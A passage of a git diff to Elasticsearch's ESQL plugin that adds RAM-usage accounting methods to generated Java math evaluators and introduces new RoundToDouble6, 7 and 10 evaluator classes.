org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LogEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LogEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator base; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += base.baseRamBytesUsed(); + baseRamBytesUsed += value.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock baseBlock, DoubleBlock valueBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/PowEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/PowEvaluator.java index 9bf553632a98e..c784090c77045 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/PowEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/PowEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class PowEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(PowEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator base; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += base.baseRamBytesUsed(); + baseRamBytesUsed += exponent.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock baseBlock, DoubleBlock exponentBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleEvaluator.java index cebb54ee59cc5..b3ebab75d9aae 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += decimals.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock, LongBlock decimalsBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleNoDecimalsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleNoDecimalsEvaluator.java index d81d10e1519b9..c8be0cfcef8e7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleNoDecimalsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleNoDecimalsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundDoubleNoDecimalsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundDoubleNoDecimalsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundIntEvaluator.java index 034bad3fdc1a3..684576a288c34 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += decimals.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock valBlock, LongBlock decimalsBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundLongEvaluator.java index b72465cd14b8a..0757bacb4201b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -57,6 +60,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += decimals.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valBlock, LongBlock decimalsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble10Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble10Evaluator.java new file mode 100644 index 0000000000000..4072e5c7c16f7 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble10Evaluator.java @@ -0,0 +1,195 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToDouble10Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble10Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final double p8; + + private final double p9; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble10Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8, + double p9, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final double p8; + + private final double p9; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8, + double p9) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + } + + @Override + public RoundToDouble10Evaluator get(DriverContext context) { + return new RoundToDouble10Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, p9, context); + } + + @Override + public String toString() { + return "RoundToDouble10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble1Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble1Evaluator.java index baf436c31448e..51519b3828d0c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble1Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble1Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToDouble1Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble1Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble2Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble2Evaluator.java index 5c61e26a2d2cc..ce1d693e8c057 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble2Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble2Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToDouble2Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble2Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble3Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble3Evaluator.java index 002f05385d3b2..caf29fb804761 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble3Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble3Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToDouble3Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble3Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -57,6 +60,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble4Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble4Evaluator.java index 58dac768f76f1..791a22822f5af 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble4Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble4Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToDouble4Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble4Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -60,6 +63,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble6Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble6Evaluator.java new file mode 100644 index 0000000000000..63928ea2a277d --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble6Evaluator.java @@ -0,0 +1,169 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToDouble6Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble6Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble6Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + } + + @Override + public RoundToDouble6Evaluator get(DriverContext context) { + return new RoundToDouble6Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, context); + } + + @Override + public String toString() { + return "RoundToDouble6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble7Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble7Evaluator.java new file mode 100644 index 0000000000000..0a5d78954928b --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble7Evaluator.java @@ -0,0 +1,176 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToDouble7Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble7Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble7Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 